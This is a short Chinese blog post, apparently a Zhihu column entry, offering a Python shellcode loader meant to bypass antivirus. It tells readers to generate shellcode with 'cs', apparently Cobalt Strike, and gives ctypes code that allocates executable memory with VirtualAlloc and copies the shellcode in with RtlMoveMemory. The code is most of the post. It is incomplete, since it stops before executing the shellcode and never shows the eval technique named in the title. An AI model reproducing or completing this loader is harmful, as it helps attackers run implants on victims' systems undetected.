python3 shellcode 使用eval函数 bypass AV

2 年前 · 来自专栏漏洞推送

蓝翼

使用Python版本

使用cs生成与Python版本对应的shellcode

shellcode load

import ctypes
#shellcode加载
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))

推荐文章

纯真的圣诞树 · 久不见成都西，上新一座「西源集」 - 知乎

9 月前

千年单身的围巾 · 如何看待《我的英雄学院》作者本人接受改名要求但拒绝道歉？ - 知乎

1 年前